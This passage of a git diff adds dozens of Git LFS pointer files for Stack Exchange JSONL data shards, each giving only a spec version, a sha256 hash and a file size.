sha256:30ff588364364a13fab16dce30550407153d757cd7bb091b0aa6a0f25d09889e +size 34784639 diff --git a/data/stackexchange/1-1/516_2289.jsonl b/data/stackexchange/1-1/516_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8a784b9be13eca3feacae8774fb58d8c3680b5ae --- /dev/null +++ b/data/stackexchange/1-1/516_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c51c04e986ec487e59503f0a0abc9758b1ec3bc7fe7ad0fecfa504ad32facb27 +size 35267708 diff --git a/data/stackexchange/1-1/517_2289.jsonl b/data/stackexchange/1-1/517_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..53279be1d90ccff5dd5e7c96bf97036612914bf0 --- /dev/null +++ b/data/stackexchange/1-1/517_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9d1538f3bcac66a750b711facbfd43b2f84798fa3c78dbf5dffd650ecfce70b6 +size 35454040 diff --git a/data/stackexchange/1-1/518_2289.jsonl b/data/stackexchange/1-1/518_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..47102889245ce7adbec834a7b1fe65fc6397898b --- /dev/null +++ b/data/stackexchange/1-1/518_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:553a00848cc0913cbdf2c1debdd5efcd73781a5e7eef70542f18c9ad20e82435 +size 34883015 diff --git a/data/stackexchange/1-1/519_2289.jsonl b/data/stackexchange/1-1/519_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9ea6aee3da9c3259ff868a3a796b1d6bdb8b1f9d --- /dev/null +++ b/data/stackexchange/1-1/519_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c0c841ba70458500710bcd7fd7116cbac742543ce1f7c29522b401c4c2980a09 +size 35085324 diff --git a/data/stackexchange/1-1/51_2289.jsonl b/data/stackexchange/1-1/51_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..58f4a3fea35c5eee09b4b4329fcf7eca7cb15f0c --- /dev/null +++ b/data/stackexchange/1-1/51_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:518aa269ff1b8335e40f953c6bb92dc1a25f1ff61a69f06243880aa6753f4da4 +size 39724043 diff --git a/data/stackexchange/1-1/520_2289.jsonl b/data/stackexchange/1-1/520_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e1360f2c2f51a95d4113aae0e06cfeef2ad00cbd --- /dev/null +++ b/data/stackexchange/1-1/520_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3a21d8522724f8dbffacca392868ac52d85f1227f092c7fd36a53f091eb333ae +size 35087250 diff --git a/data/stackexchange/1-1/521_2289.jsonl b/data/stackexchange/1-1/521_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3ac263dfb4cfa415321c45e0b6836a87b3c4d20a --- /dev/null +++ b/data/stackexchange/1-1/521_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:49a70bde110dec3768bbbf8614d15a15044e1d3bb21ea8d6b86c4922b03afbc9 +size 35171402 diff --git a/data/stackexchange/1-1/522_2289.jsonl b/data/stackexchange/1-1/522_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..30ae23e5ae8e361631a616374d4b826ed9a90222 --- /dev/null +++ b/data/stackexchange/1-1/522_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:50972cc9016e807da344178014e8b053bd27f004b512c32eeadc4e476110af17 +size 35334064 diff --git a/data/stackexchange/1-1/523_2289.jsonl b/data/stackexchange/1-1/523_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..9b1d2b27735a6ab5cde3ce613915b7d247923f48 --- /dev/null +++ b/data/stackexchange/1-1/523_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:74d324dea427de0c7798fbeebfcba47f6eaae8e197c4f2bcf7270fd32df9e839 +size 35138931 diff --git a/data/stackexchange/1-1/524_2289.jsonl b/data/stackexchange/1-1/524_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e49704693ab6b934538fcc8849059afb2993e66a --- /dev/null +++ b/data/stackexchange/1-1/524_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0e1f14ce7200315bfec0074941c73e72fa6258ba464415d2fdc789800a47063a +size 35356491 diff --git a/data/stackexchange/1-1/525_2289.jsonl b/data/stackexchange/1-1/525_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..588bcf8ac3bcd7d80b780a9766e2d4c601c84665 --- /dev/null +++ b/data/stackexchange/1-1/525_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3609f373c67e8a8b42a0079ee34b9b708cb31c5cd6e08f7e1a42b5bdb01e6e3f +size 35214279 diff --git a/data/stackexchange/1-1/526_2289.jsonl b/data/stackexchange/1-1/526_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e0b7170e8bdcd2d8740c1a56bbd96b94decfceec --- /dev/null +++ b/data/stackexchange/1-1/526_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3392b2d4ed497a7a8e5c79ea4ca68f756438c24c807633b3f37f8682db345368 +size 35338891 diff --git a/data/stackexchange/1-1/527_2289.jsonl b/data/stackexchange/1-1/527_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f8a6ab57d260c6f7bf35d923d5b98e838a390b83 --- /dev/null +++ b/data/stackexchange/1-1/527_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f64d0e3d329002c257871523c6a189b31b43b6c827514695c7f4427394205902 +size 35896674 diff --git a/data/stackexchange/1-1/528_2289.jsonl b/data/stackexchange/1-1/528_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d0e2d65ebcbe22b833ce7cff3c9ce3bae016cc9d --- /dev/null +++ b/data/stackexchange/1-1/528_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4818befd671e45369ea0a260384624655e3d5764da8dbd049f0e02dad5358ddd +size 35306372 diff --git a/data/stackexchange/1-1/529_2289.jsonl b/data/stackexchange/1-1/529_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a72ba7eeed2c6fb507eb10f34f56aa864c3b931b --- /dev/null +++ b/data/stackexchange/1-1/529_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:689c09f821032956fc7624c92a6afbb3f2d98342f619cd1132a3138e2e200824 +size 35132659 diff --git a/data/stackexchange/1-1/52_2289.jsonl b/data/stackexchange/1-1/52_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8882fe3391a5fcc342b4a8fe7b2297db3ea6cc54 --- /dev/null +++ b/data/stackexchange/1-1/52_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c5de766b362caf6541b4ed6a3eb4612c60bb5aa9c877555981cd1603eb1d66b6 +size 40167628 diff --git a/data/stackexchange/1-1/530_2289.jsonl b/data/stackexchange/1-1/530_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..19da21901515fc9d78f8f1ec6212105fb0f16c53 --- /dev/null +++ b/data/stackexchange/1-1/530_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:13348510168e8da33e7adf950a880e8e48e92f2c15572052a167328afa14a97b +size 35004179 diff --git a/data/stackexchange/1-1/531_2289.jsonl b/data/stackexchange/1-1/531_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b4a2e9afe936d492f13b9a1ec762ca21b37da038 --- /dev/null +++ b/data/stackexchange/1-1/531_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:52a1a6609dae6437d2d16d85c6f2ab6cdd18eb3e3c4c5f4f4c13e8682e815267 +size 35293317 diff --git a/data/stackexchange/1-1/532_2289.jsonl b/data/stackexchange/1-1/532_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6a12e02cf54a84dc42ba80bea0e7fde5fb7db13a --- /dev/null +++ b/data/stackexchange/1-1/532_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4537b29dfafafedbfbdc5b526a814c24fc96d2cff680fa4e1bb12242d6bdc523 +size 35875366 diff --git a/data/stackexchange/1-1/533_2289.jsonl b/data/stackexchange/1-1/533_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a33d18405ef8c1f7d15219a34e5bee5fa034865c --- /dev/null +++ b/data/stackexchange/1-1/533_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b5b675801717cc62d6d90317f1715bddea61aceaeec34c15cbface0800f2d50b +size 35722948 diff --git a/data/stackexchange/1-1/534_2289.jsonl b/data/stackexchange/1-1/534_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..52c936defd9de5e2683d93eaa54124ba50eff2bd --- /dev/null +++ b/data/stackexchange/1-1/534_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b3d5dd24c85313db5868db9f8930994f05a971f240bbe36a4ba35a464f6839c6 +size 35275898 diff --git a/data/stackexchange/1-1/535_2289.jsonl b/data/stackexchange/1-1/535_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c4073562380eb13ffeef425e7ca7cceff92340a0 --- /dev/null +++ b/data/stackexchange/1-1/535_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b080a90bf99655db000d345338b8161b365c1318256c0819714a96c1ecf6255d +size 35771950 diff --git a/data/stackexchange/1-1/536_2289.jsonl b/data/stackexchange/1-1/536_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bb249860d414310e9e960b99f19b44ae47621d30 --- /dev/null +++ b/data/stackexchange/1-1/536_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:10eb0021256a755ecf8da4a74fb2cbd1cf95b8e7185e730ba99807576f561ad0 +size 35510344 diff --git a/data/stackexchange/1-1/537_2289.jsonl b/data/stackexchange/1-1/537_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f89a55cdaf45ce0eab8c972d578f91a9b00955b7 --- /dev/null +++ b/data/stackexchange/1-1/537_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ec104cc305ade3a64474e78e4542c5c95927f4affcd785e7a660f1ff3e26517d +size 35240162 diff --git a/data/stackexchange/1-1/538_2289.jsonl b/data/stackexchange/1-1/538_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ca5fc0bfb8c393cc7e21c955d1cfa5bfe4b679d6 --- /dev/null +++ b/data/stackexchange/1-1/538_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8383c09fb1d970e5a8ffa17d985ed7fc614f0edeb2ba57849343274b906b27c3 +size 35252672 diff --git a/data/stackexchange/1-1/539_2289.jsonl b/data/stackexchange/1-1/539_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..1fb0377f47e820e3283f9ce355a8218c80cc5a3c --- /dev/null +++ b/data/stackexchange/1-1/539_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3c3d3dce8d7451da0b892ce9b5d39f0d9c2d4474e3dba6d3fbbd1c6e935da1ee +size 35044319 diff --git a/data/stackexchange/1-1/53_2289.jsonl b/data/stackexchange/1-1/53_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a68c89d2305d0cb87baeaddff677e5a04cabe659 --- /dev/null +++ b/data/stackexchange/1-1/53_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c57eca88dae088a4b3bf2f47c15cd845bef8005e9e0ff1ecd2cd2611a05feca1 +size 38750672 diff --git a/data/stackexchange/1-1/540_2289.jsonl b/data/stackexchange/1-1/540_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a657a0417e7464e6894cca7d943730aeac455797 --- /dev/null +++ b/data/stackexchange/1-1/540_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cf98e62f59e1e9368bb7d12e53dbd785e37d161f31f1654018cbe87dab267ba3 +size 35792389 diff --git a/data/stackexchange/1-1/541_2289.jsonl b/data/stackexchange/1-1/541_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..314a2ac30ad150c7c41b8d14ca14d764b5b926c4 --- /dev/null +++ b/data/stackexchange/1-1/541_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5e1c8f8973c25f3a73ce650c9cdf2a272e5588f86f5513a968a4861c39729b17 +size 35079545 diff --git a/data/stackexchange/1-1/542_2289.jsonl b/data/stackexchange/1-1/542_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6e73addf5d0b81834e06e4c5dfce39636beadf92 --- /dev/null +++ b/data/stackexchange/1-1/542_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f30f35445b9334ad306fa573555ecb4a3959cc30ad14eda88273a890f597a532 +size 35498597 diff --git a/data/stackexchange/1-1/543_2289.jsonl b/data/stackexchange/1-1/543_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ca38b2cbf5caeaf30752593834a8b07048ff58e4 --- /dev/null +++ b/data/stackexchange/1-1/543_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ae1debbdfcbea8133e5358f6ff52040a090ffdd3ca8b63766bfc9997a55048b7 +size 34709545 diff --git a/data/stackexchange/1-1/544_2289.jsonl b/data/stackexchange/1-1/544_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..aff507097daf5343524556b8d9af7fab9286e4a0 --- /dev/null +++ b/data/stackexchange/1-1/544_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:edfeb880634ab73b7ed075fbb9117f2c9a312de04660709867edb394f669b118 +size 35211377 diff --git a/data/stackexchange/1-1/545_2289.jsonl b/data/stackexchange/1-1/545_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f2e9fa43114a08d7ddcedf21ccb618744e60ff66 --- /dev/null +++ b/data/stackexchange/1-1/545_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1185b8c2b0b8a2f85d3092ad30c4aec5c4138ed4e5ba7f0dfe3f441e1ace2d29 +size 35100439 diff --git a/data/stackexchange/1-1/546_2289.jsonl b/data/stackexchange/1-1/546_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..82e3355e635d25097859e52051ec52c4c99f054d --- /dev/null +++ b/data/stackexchange/1-1/546_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:90dcc8e22219e70d6163f4996153b323cfd302b53d7bb7906e0219659f69be51 +size 35699343 diff --git a/data/stackexchange/1-1/547_2289.jsonl b/data/stackexchange/1-1/547_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5fc1d2ce98a2f837627c696c0531e2579bd77c99 --- /dev/null +++ b/data/stackexchange/1-1/547_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:349e6e088d87dfc17ff9fa128b8255d69852df1d630e4b90b84156296b9d608f +size 35078551 diff --git a/data/stackexchange/1-1/548_2289.jsonl b/data/stackexchange/1-1/548_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4b854d009906be9b995c0161747aed78ba43ab23 --- /dev/null +++ b/data/stackexchange/1-1/548_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:65d0e43bda2ebe5a0ccb8e5a361adf900bf55e3a976ec7e7c0697107b02c3cd9 +size 35132953 diff --git a/data/stackexchange/1-1/549_2289.jsonl b/data/stackexchange/1-1/549_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b2d30a7fcb022e8f5449cbde8d88507eff04bcf3 --- /dev/null +++ b/data/stackexchange/1-1/549_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d7e528d81d5391958dd1b2d556d974ebc67071d15cc5b0548fbdb61328c0d795 +size 35042066 diff --git a/data/stackexchange/1-1/54_2289.jsonl b/data/stackexchange/1-1/54_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ec82b06c43d786550e907e6bbb62abf6c9a18ee0 --- /dev/null +++ b/data/stackexchange/1-1/54_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bb198040cf357a6bd1cafdbe9b97e0ec885526aacbda936f8c7b57217a99a73a +size 38832849 diff --git a/data/stackexchange/1-1/550_2289.jsonl b/data/stackexchange/1-1/550_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a466aac8c88dce8a7035ef494fd19d398ae66e1a --- /dev/null +++ b/data/stackexchange/1-1/550_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c183a3a7934a29a10015e5602f0a15d81df0ac24637cd7580a0cfb311cc3f11f +size 34075147 diff --git a/data/stackexchange/1-1/551_2289.jsonl b/data/stackexchange/1-1/551_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3deaa5bf97a65c1109ffcbe323bcfd78f437a755 --- /dev/null +++ b/data/stackexchange/1-1/551_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:93b48095dadc94929a5a4df86f2b0ec7e369775b9890f226d2d0e62fbdec8003 +size 34359627 diff --git a/data/stackexchange/1-1/552_2289.jsonl b/data/stackexchange/1-1/552_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e57f52a620482618955accdcb7046bb1b610a034 --- /dev/null +++ b/data/stackexchange/1-1/552_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b1f4df1a7287d993b746993504f199e10fa26bc6a536d9514ce2ffdc42070d03 +size 34124003 diff --git a/data/stackexchange/1-1/553_2289.jsonl b/data/stackexchange/1-1/553_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9fd8d3e1ebb020b95e1aad9e0c5655ea87d80a26 --- /dev/null +++ b/data/stackexchange/1-1/553_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:31ad8491c29c9c23701c920e54275631145107f79db3d594c38a4f1ca483e368 +size 34365159 diff --git a/data/stackexchange/1-1/554_2289.jsonl b/data/stackexchange/1-1/554_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..e7f165cacef31e4fb6944172b347d00deaf50fa3 --- /dev/null +++ b/data/stackexchange/1-1/554_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b377e5b2b9e3c5603278cb7ed39da6a5b27bd809e1de5a6dd2348505b20e59c0 +size 34318690 diff --git a/data/stackexchange/1-1/555_2289.jsonl b/data/stackexchange/1-1/555_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9801e5db5fac9e817e971117599d14a401df1ea1 --- /dev/null +++ b/data/stackexchange/1-1/555_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8cf788e86dda8dad9cc2b276ad698c579937a0683a86dd53e918204b7d23f231 +size 34154606 diff --git a/data/stackexchange/1-1/556_2289.jsonl b/data/stackexchange/1-1/556_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5b7578d7ce6c3d8fdeb2025d0a5ed5cd91040fb2 --- /dev/null +++ b/data/stackexchange/1-1/556_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b7bb55d4cde239fc9372bf7c32badf92fe79b86db52ad57c658edf6ac4d516db +size 34145817 diff --git a/data/stackexchange/1-1/557_2289.jsonl b/data/stackexchange/1-1/557_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f2fcf57405f5099bf35844b4e1e4b8cf81b3839a --- /dev/null +++ b/data/stackexchange/1-1/557_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a9575c4d322469277f7279de07cec2c095cf89994393ce0ed5754dad97167e4b +size 34516391 diff --git a/data/stackexchange/1-1/558_2289.jsonl b/data/stackexchange/1-1/558_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..137bad5b3aa29d3ba8051787dfeb2f8464ad8124 --- /dev/null +++ b/data/stackexchange/1-1/558_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d1546558d241692375dcab9a3d1e4ef2b4a7740b4e0c4dd99054c3486212ca28 +size 34819193 diff --git a/data/stackexchange/1-1/559_2289.jsonl b/data/stackexchange/1-1/559_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..288e918758a3cf4d7361d84ec909e544f0136616 --- /dev/null +++ b/data/stackexchange/1-1/559_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4143a01334071aa8f29f0b581af7719091d397b113ccb1ecec72d71e9a295b27 +size 34133548 diff --git a/data/stackexchange/1-1/55_2289.jsonl b/data/stackexchange/1-1/55_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ad36d1ea6d15ec03a7d0a2ac79380ce38b0872be --- /dev/null +++ b/data/stackexchange/1-1/55_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:94d1447e01c218f0b270d0d313b96d2212f432a46d489aca589be50c976e1d6f +size 39599760 diff --git a/data/stackexchange/1-1/560_2289.jsonl b/data/stackexchange/1-1/560_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9e09ff468f4a6e046473b495c7afb9e3afa03cc2 --- /dev/null +++ b/data/stackexchange/1-1/560_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:defe8324ab57b9f8fa592c15caff468fa6fb6517d2ecc9bbd3d596e76901a2c1 +size 34391010 diff --git a/data/stackexchange/1-1/561_2289.jsonl b/data/stackexchange/1-1/561_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4e9ac6eefafcadbc379e9117af9ff4305d8e33a4 --- /dev/null +++ b/data/stackexchange/1-1/561_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:dd9bde03ae66814e1e214e57903322b8887fe0583fc5c1a68b07024772337278 +size 34295854 diff --git a/data/stackexchange/1-1/562_2289.jsonl b/data/stackexchange/1-1/562_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..596a77203dc0414e430668dad2f77ea9af686636 --- /dev/null +++ b/data/stackexchange/1-1/562_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d148409d12091286ccd6e4732a22342dff2576452a39a14f432dba99d0ddc579 +size 34448213 diff --git a/data/stackexchange/1-1/563_2289.jsonl b/data/stackexchange/1-1/563_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..22fd6ea7a842cebd59722da8a43d2d81a349a57c --- /dev/null +++ b/data/stackexchange/1-1/563_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3b2b59b5e8a818f0602222e4707877a6e965ab05c23dc468f833ce68cd5db3da +size 34399024 diff --git a/data/stackexchange/1-1/564_2289.jsonl b/data/stackexchange/1-1/564_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2ab3778bc7756c6edf288dee555c532c4155215e --- /dev/null +++ b/data/stackexchange/1-1/564_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:72653204090df903852dffd84fc33a5fd51824c500bcfe122c384d573e9322d2 +size 34550702 diff --git a/data/stackexchange/1-1/565_2289.jsonl b/data/stackexchange/1-1/565_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3d911fe6a063ea7db1120e5fd7d1bc1f34309c3a --- /dev/null +++ b/data/stackexchange/1-1/565_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dae95cb4473d73459a61cca833f20316e58b7b6254fb5370e3350545545478fe +size 34576617 diff --git a/data/stackexchange/1-1/566_2289.jsonl b/data/stackexchange/1-1/566_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d05c374227cd5bfaa8a387720d157fae3a824868 --- /dev/null +++ b/data/stackexchange/1-1/566_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8408ecfbe1b887e523bcaf6e3f4871cc14159d5221905c3570bbecfcacae576c +size 34651727 diff --git a/data/stackexchange/1-1/567_2289.jsonl b/data/stackexchange/1-1/567_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ab2d5bd55b5ef919f7a1eab4871f61504197eb6e --- /dev/null +++ b/data/stackexchange/1-1/567_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3ad393e9ba0488d2a0f7cfd68e12357a321cc9f2095c6b681961e12e5a7d6eb6 +size 34080443 diff --git a/data/stackexchange/1-1/568_2289.jsonl b/data/stackexchange/1-1/568_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..deb230f1880eae7d35ee2ea0ce44cc9d834355e3 --- /dev/null +++ b/data/stackexchange/1-1/568_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:23751b9ceb808f525ae7ed241d554a772d2124d2f62886e8d9512756d367be7c +size 34320606 diff --git a/data/stackexchange/1-1/569_2289.jsonl b/data/stackexchange/1-1/569_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..171952d49cf07006f327c185e4b71c903ea3c456 --- /dev/null +++ b/data/stackexchange/1-1/569_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9f833934a23a1bcf62946afa063072ea17ea100891484ac48b46e5e8aef2636f +size 34925222 diff --git a/data/stackexchange/1-1/56_2289.jsonl b/data/stackexchange/1-1/56_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..231982e4ed65b115d4be0e995a4084134e508ccd --- /dev/null +++ b/data/stackexchange/1-1/56_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8d7b9d6f627cadeae680ebda96b7a05df9f59b0ff4951de13d26d7603064aac3 +size 40150385 diff --git a/data/stackexchange/1-1/570_2289.jsonl b/data/stackexchange/1-1/570_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..262c326e4f8be05d29bd0bc2562752e23e1b1ae6 --- /dev/null +++ b/data/stackexchange/1-1/570_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ad3d8c70198c888deb3a9afca1f666cb1ac90678d5d50fc930ebe6e09591bc1f +size 34396921 diff --git a/data/stackexchange/1-1/571_2289.jsonl b/data/stackexchange/1-1/571_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ae7b9713701f208b87bbe270e2994b3036f83155 --- /dev/null +++ b/data/stackexchange/1-1/571_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ec730aa77cad1e3aad8d6a0492a5ea2dd30f9ad3d1f73905cf0f529fd9ab1c92 +size 33842622 diff --git a/data/stackexchange/1-1/572_2289.jsonl b/data/stackexchange/1-1/572_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a87228894187dfb80c3e91073a319b3e36b76ae3 --- /dev/null +++ b/data/stackexchange/1-1/572_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9b473cc3186c7d6dee18d7fae88c916e403e2344c7fe58f55f8d3274279161e1 +size 34902096 diff --git a/data/stackexchange/1-1/573_2289.jsonl b/data/stackexchange/1-1/573_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..344bac9147b35c0df3fb9fd433b38f78bfe2e2e9 --- /dev/null +++ b/data/stackexchange/1-1/573_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:69387b051aa086483cea46cdb8e80986779904fdd1a785fa4e787091bc3a3f1b +size 34498240 diff --git a/data/stackexchange/1-1/574_2289.jsonl b/data/stackexchange/1-1/574_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0a16297a9e098ef254acc470f1a06618de6270c3 --- /dev/null +++ b/data/stackexchange/1-1/574_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9f685d4058a2e83c367a594d308db1b7c6f2be7a7ea8b36bd71f9ab305cb7a54 +size 34620431 diff --git a/data/stackexchange/1-1/575_2289.jsonl b/data/stackexchange/1-1/575_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ac945f10c2837e59f2ea2438e6d744af92552b95 --- /dev/null +++ 